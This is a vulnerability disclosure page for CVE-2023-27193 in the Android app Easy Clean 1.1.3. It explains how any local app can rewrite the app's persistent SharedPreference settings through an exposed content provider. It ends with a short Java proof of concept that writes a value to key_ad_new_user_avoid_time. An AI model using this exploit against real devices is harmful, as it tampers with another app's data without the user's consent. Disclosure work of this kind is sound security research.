CVE-2023-27193: SODA/CVE detail.md at main · LianKee/SODA

Permalink

Escalation of Privileges exists in Easy Clean（CVE-2023-27193）

Vendor：DUALSPACE(http://www.dualspace.com/pc/en/products.html)

Affected product：Easy Clean (com.ludashi.xsuperclean)

Version：1.1.3

Download link：https://apkpure.com/cn/space-clean-super-cleaner/com.ludashi.xsuperclean

Description of the vulnerability for use in the CVE：An issue found in DUALSPACE v.1.1.3 allows a local attacker to gain privileges via the key_ad_new_user_avoid_time field.

Additional information：The app is a mobile clean app, which can free up storage space. Upon opening, the app loads the SharedPreference files into memory and uses the data in some important functions. If a malicious app modifies important data in the SharedPreference files, the Easy Clean app will not behave properly when loading this data. This can cause security hazards, such as ad blocking (by modifying the key_ad_new_user_avoid_time field). Even worse, users cannot fix the security issue by rebooting victim devices, since the injected data is persistent in the SharedPreference files.

poc：

public void attack(){ ContentResolver contentResolver = this.getApplicationContext().getContentResolver(); Uri uri = Uri.parse(“content://com.ludashi.xsuperclean.util.pref.SharedPrefProvider”); ContentValues contentValues = new ContentValues(); contentValues.put(“file_name","__default__”); contentValues.put("type",4); contentValues.put(“key","key_ad_new_user_avoid_time”); contentValues.put(“value","100000”); contentResolver.update(uri,contentValues,null,null); }